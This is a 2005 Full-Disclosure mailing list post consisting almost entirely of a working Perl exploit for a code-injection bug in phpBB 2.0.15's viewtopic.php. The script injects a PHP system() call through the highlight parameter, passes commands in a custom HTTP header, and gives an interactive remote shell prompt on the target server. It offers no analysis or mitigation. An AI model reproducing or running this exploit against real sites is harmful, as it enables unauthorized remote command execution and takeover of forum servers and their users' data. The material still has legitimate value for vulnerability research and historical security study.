[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] phpBB 2.0.15 exploit (w0op!)
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] phpBB 2.0.15 exploit (w0op!)
- From: dab <dab@xxxxxxxxxxxxxx>
- Date: Thu, 30 Jun 2005 01:44:24 +0200 (CEST)
See attached file.
--
dab @ !dSR
http://www.digitalsec.net
-
#!/usr/bin/perl
# Wed Jun 29 19:08:04 CEST 2005 dab@xxxxxxxxxxxxxx
#
# phpBB 2.0.15 -re-bug in viewtopic.php
# The complete Open Source Development with CVS: GNU General Public License
# Book on using CVS effectively <--------- cvs, is also GPL
# or http://www.google.es/search?q=programming+howto
#
# BLINK! BLINK! BLINK! *** BRUTEFORCE CAPABILITIES *** BLINK! BLINK! BLINK!
#
#
# Example: ./phpbb2_0_15.pl http://www.server.com/viewtopic.php?t=1
# You can start typing commands.
# Tested in BSD. Theo.. it works!
#
# !dSR: que todos los hackers digan YO!!
#
#
use strict;
use IO::Socket;
unless ($ARGV[0]) { print "$0 <viewtopic url>\n"; exit(1); }
$ARGV[0] =~ m!http://(.*?)/(.*?t=\d+)!;
my ($server, $port) = split (/:/,$1);
$port = 80 unless defined($port);
$server = $1 unless defined($server);
my ($url, $command) = $2;
print "$server - $port - $url\n";
while () {
print "phpBB2.0.15> ";
while(<STDIN>) {
$command=$_;
chomp($command);
last;
}
&send($command);
}
sub send {
my $ok = 0;
my $cmd = "echo \"#PHPBBEXPLOIT#\";".$_[0].";echo \"#PHPBBEXPLOIT#\"";
my $string = "GET /$url&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.1\n".
"Host: $server\nPHP: $cmd\n\n\n\n";
my $socket = IO::Socket::INET->new(PeerAddr => $server,
PeerPort => $port,
Proto => "tcp",
Type => SOCK_STREAM)
or die "can't connect to: $server : $@\n";
print $socket $string;
while(<$socket>) {
if (/#PHPBBEXPLOIT#/) {
close($socket) and last if $ok eq 2;
$ok++;
next;
}
print if $ok eq "1";
}
}
exit 0;
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/